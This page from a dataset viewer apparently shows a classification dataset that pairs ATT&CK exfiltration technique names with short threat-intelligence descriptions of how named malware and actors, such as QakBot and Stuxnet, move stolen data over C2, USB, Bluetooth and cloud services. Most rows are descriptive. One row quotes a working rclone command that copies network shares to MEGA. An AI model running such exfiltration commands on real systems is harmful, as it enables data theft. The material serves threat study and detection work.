prompt
stringclasses 508
values | procedure
stringlengths 20
478
|
---|---|
Exfiltration Over C2 Channel
|
Lokibot has the ability to initiate contact with command and control (C2) to exfiltrate stolen data.
|
Exfiltration Over C2 Channel
|
It has used malware that exfiltrates stolen data to its C2 server.
|
Exfiltration Over C2 Channel
|
It's collected data is exfiltrated over the same channel used for C2.
|
Exfiltration Over C2 Channel
|
MacMa exfiltrates data from a supplied path over its C2 channel.
|
Exfiltration Over C2 Channel
|
Mafalda can send network system data and files to its C2 server.
|
Exfiltration Over C2 Channel
|
MarkiRAT can exfiltrate locally stored data via its C2.
|
Exfiltration Over C2 Channel
|
MechaFlounder has the ability to send the compromised user's account name and hostname within a URL to C2.
|
Exfiltration Over C2 Channel
|
metaMain can upload collected files and data to its C2 server.
|
Exfiltration Over C2 Channel
|
Metamorfo can send the data it collects to the C2 server.
|
Exfiltration Over C2 Channel
|
Mis-Type has transmitted collected files and data to its C2 server.
|
Exfiltration Over C2 Channel
|
Misdat has uploaded files and data to its C2 servers.
|
Exfiltration Over C2 Channel
|
MobileOrder exfiltrates data to its C2 server over the same protocol as C2 communications.
|
Exfiltration Over C2 Channel
|
Mongall can upload files and information from a compromised host to its C2 server.
|
Exfiltration Over C2 Channel
|
It has used C2 infrastructure to receive exfiltrated data.
|
Exfiltration Over C2 Channel
|
NETEAGLE is capable of reading files over the C2 channel.
|
Exfiltration Over C2 Channel
|
NightClub can use SMTP and DNS for file exfiltration and C2.
|
Exfiltration Over C2 Channel
|
njRAT has used HTTP to receive stolen information from the infected machine.
|
Exfiltration Over C2 Channel
|
Octopus has uploaded stolen files and data from a victim's machine over its C2 channel.
|
Exfiltration Over C2 Channel
|
Data exfiltration is done by Okrum using the already opened channel with the C2 server.
|
Exfiltration Over C2 Channel
|
OopsIE can upload files from the victim's machine to its C2 server.
|
Exfiltration Over C2 Channel
|
During Operation Dream Job, It exfiltrated data from a compromised host to actor-controlled C2 servers.
|
Exfiltration Over C2 Channel
|
During Operation Honeybee, the threat actors uploaded stolen files to their C2 servers.
|
Exfiltration Over C2 Channel
|
During Operation Wocao, threat actors used the XServer backdoor to exfiltrate data.
|
Exfiltration Over C2 Channel
|
OutSteel can upload files from a compromised host over its C2 channel.
|
Exfiltration Over C2 Channel
|
PcShare can upload files and information from a compromised host to its C2 servers.
|
Exfiltration Over C2 Channel
|
Penquin can execute the command code do_upload to send files to C2.
|
Exfiltration Over C2 Channel
|
PingPull has the ability to exfiltrate stolen victim data through its C2 channel.
|
Exfiltration Over C2 Channel
|
PoetRAT has exfiltrated data over the C2 channel.
|
Exfiltration Over C2 Channel
|
PowerShower has used a PowerShell document stealer module to pack and exfiltrate .txt, .pdf, .xls or .doc files smaller than 5MB that were modified during the past two days.
|
Exfiltration Over C2 Channel
|
Proxysvc performs data exfiltration over the control server channel using a custom protocol.
|
Exfiltration Over C2 Channel
|
Psylo exfiltrates data to its C2 server over the same protocol as C2 communications.
|
Exfiltration Over C2 Channel
|
Pteranodon exfiltrates screenshot files to its C2 server.
|
Exfiltration Over C2 Channel
|
Pupy can send screenshots files, keylogger data, files, and recorded audio back to the C2 server.
|
Exfiltration Over C2 Channel
|
QakBot can send stolen information to C2 nodes including passwords, accounts, and emails.
|
Exfiltration Over C2 Channel
|
RDAT can exfiltrate data gathered from the infected system via the established Exchange Web Services API C2 channel.
|
Exfiltration Over C2 Channel
|
Remexi performs exfiltration over BITSAdmin, which is also used for the C2 channel.
|
Exfiltration Over C2 Channel
|
REvil can exfiltrate host and malware information to C2 servers.
|
Exfiltration Over C2 Channel
|
Rising Sun can send data gathered from the infected machine via HTTP POST request to the C2.
|
Exfiltration Over C2 Channel
|
ROKRAT can send collected files back over same C2 channel.
|
Exfiltration Over C2 Channel
|
RotaJakiro sends device and other collected data back to the C2 using the established C2 channels over TCP.
|
Exfiltration Over C2 Channel
|
S-Type has uploaded data and files from a compromised host to its C2 servers.
|
Exfiltration Over C2 Channel
|
It has sent system information to its C2 server using HTTP.
|
Exfiltration Over C2 Channel
|
SDBbot has sent collected data from a compromised host to its C2 servers.
|
Exfiltration Over C2 Channel
|
Shark has the ability to upload files from the compromised host over a DNS or HTTP C2 channel.
|
Exfiltration Over C2 Channel
|
SharpDisco can load a plugin to exfiltrate stolen files to SMB shares also used in C2.
|
Exfiltration Over C2 Channel
|
ShimRatReporter sent generated reports to the C2 via HTTP POST requests.
|
Exfiltration Over C2 Channel
|
SideTwist has exfiltrated data over its C2 channel.
|
Exfiltration Over C2 Channel
|
SILENTTRINITY can transfer files from an infected host to the C2 server.
|
Exfiltration Over C2 Channel
|
Sliver can exfiltrate files from the victim using the download command.
|
Exfiltration Over C2 Channel
|
SLOTHFULMEDIA has sent system information to a C2 server via HTTP and HTTPS POST requests.
|
Exfiltration Over C2 Channel
|
SMOKEDHAM has exfiltrated data to its C2 server.
|
Exfiltration Over C2 Channel
|
SombRAT has uploaded collected data and files from a compromised host to its C2 server.
|
Exfiltration Over C2 Channel
|
Spark has exfiltrated data over the C2 channel.
|
Exfiltration Over C2 Channel
|
Squirrelwaffle has exfiltrated victim data using HTTP POST requests to its C2 servers.
|
Exfiltration Over C2 Channel
|
STARWHALE can exfiltrate collected data to its C2 servers.
|
Exfiltration Over C2 Channel
|
After data is collected by It malware, it is exfiltrated over the existing C2 channel.
|
Exfiltration Over C2 Channel
|
StrifeWater can send data and files from a compromised host to its C2 server.
|
Exfiltration Over C2 Channel
|
StrongPity can exfiltrate collected documents through C2 channels.
|
Exfiltration Over C2 Channel
|
Stuxnet sends compromised victim information via HTTP.
|
Exfiltration Over C2 Channel
|
SUGARDUMP has sent stolen credentials and other data to its C2 server.
|
Exfiltration Over C2 Channel
|
SVCReady can send collected data in JSON format to its C2 server.
|
Exfiltration Over C2 Channel
|
SysUpdate has exfiltrated data over its C2 channel.
|
Exfiltration Over C2 Channel
|
TajMahal has the ability to send collected files over its C2.
|
Exfiltration Over C2 Channel
|
ThiefQuest exfiltrates targeted file extensions in the /Users/ folder to the command and control server via unencrypted HTTP. Network packets contain a string with two pieces of information: a file path and the contents of the file in a base64 encoded string.
|
Exfiltration Over C2 Channel
|
Tomiris can upload files matching a hardcoded set of extensions, such as .doc, .docx, .pdf, and .rar, to its C2 server.
|
Exfiltration Over C2 Channel
|
Torisma can send victim data to an actor-controlled C2 server.
|
Exfiltration Over C2 Channel
|
TrickBot can send information about the compromised host and upload data to a hardcoded C2 server.
|
Exfiltration Over C2 Channel
|
Ursnif has used HTTP POSTs to exfil gathered information.
|
Exfiltration Over C2 Channel
|
Valak has the ability to exfiltrate data over the C2 channel.
|
Exfiltration Over C2 Channel
|
WarzoneRAT can send collected victim data to its C2 server.
|
Exfiltration Over C2 Channel
|
It has exfiltrated domain credentials and network enumeration information over command and control (C2) channels.
|
Exfiltration Over C2 Channel
|
Woody RAT can exfiltrate files from an infected machine to its C2 server.
|
Exfiltration Over C2 Channel
|
XCSSET exfiltrates data stolen from a system over its C2 channel.
|
Exfiltration Over C2 Channel
|
Zebrocy has exfiltrated data to the designated C2 server using HTTP POST requests.
|
Exfiltration Over C2 Channel
|
ItM has exfiltrated files via the Dropbox API C2.
|
Exfiltration Over C2 Channel
|
ZLib has sent data and files from a compromised host to its C2 servers.
|
Exfiltration Over Other Network Medium:Exfiltration Over Bluetooth
|
Flame has a module named BeetleJuice that contains Bluetooth functionality that may be used in different ways, including transmitting encoded information from the infected system over the Bluetooth protocol, acting as a Bluetooth beacon, and identifying other Bluetooth devices in the vicinity.
|
Exfiltration Over Physical Medium:Exfiltration over USB
|
Agent.btz creates a file named thumb.dd on all USB flash drives connected to the victim. This file contains information about the infected system and activity logs.
|
Exfiltration Over Physical Medium:Exfiltration over USB
|
It has a feature to copy files from every drive onto a removable drive in a hidden folder.
|
Exfiltration Over Physical Medium:Exfiltration over USB
|
It has used a customized PlugX variant which could exfiltrate documents from air-gapped networks.
|
Exfiltration Over Physical Medium:Exfiltration over USB
|
Remsec contains a module to move data from airgapped networks to Internet-connected systems by using a removable USB device.
|
Exfiltration Over Physical Medium:Exfiltration over USB
|
SPACESHIP copies staged data to removable drives when they are inserted into the system.
|
Exfiltration Over Physical Medium:Exfiltration over USB
|
It has exfiltrated data using USB storage devices.
|
Exfiltration Over Physical Medium:Exfiltration over USB
|
USBStealer exfiltrates collected files via removable media from air-gapped victims.
|
Exfiltration Over Web Service
|
AppleSeed has exfiltrated files using web services.
|
Exfiltration Over Web Service
|
It can exfiltrate data over Google Drive.
|
Exfiltration Over Web Service
|
During C0017, It used Cloudflare services for data exfiltration.
|
Exfiltration Over Web Service
|
DropBook has used legitimate web services to exfiltrate data.
|
Exfiltration Over Web Service
|
It has used the Telegram API sendMessage to relay data on compromised devices.
|
Exfiltration Over Web Service
|
ngrok has been used by threat actors to configure servers for data exfiltration.
|
Exfiltration Over Web Service:Exfiltration to Code Repository
|
Empire can use GitHub for data exfiltration.
|
Exfiltration Over Web Service:Exfiltration to Cloud Storage
|
BoomBox can upload data to dedicated per-victim folders in Dropbox.
|
Exfiltration Over Web Service:Exfiltration to Cloud Storage
|
BoxCaon has the capability to download folders' contents on the system and upload the results back to its Dropbox drive.
|
Exfiltration Over Web Service:Exfiltration to Cloud Storage
|
During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M.
|
Exfiltration Over Web Service:Exfiltration to Cloud Storage
|
It has exfiltrated stolen data to OneDrive accounts.
|
Exfiltration Over Web Service:Exfiltration to Cloud Storage
|
Clambling can send files from a victim's machine to Dropbox.
|
Exfiltration Over Web Service:Exfiltration to Cloud Storage
|
It has exfiltrated victim data to cloud storage service accounts.
|
Exfiltration Over Web Service:Exfiltration to Cloud Storage
|
CreepyDrive can use cloud services including OneDrive for data exfiltration.
|
Exfiltration Over Web Service:Exfiltration to Cloud Storage
|
Crutch has exfiltrated stolen data to Dropbox.
|
Exfiltration Over Web Service:Exfiltration to Cloud Storage
|
It has used the megacmd tool to upload stolen files from a victim network to MEGA.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.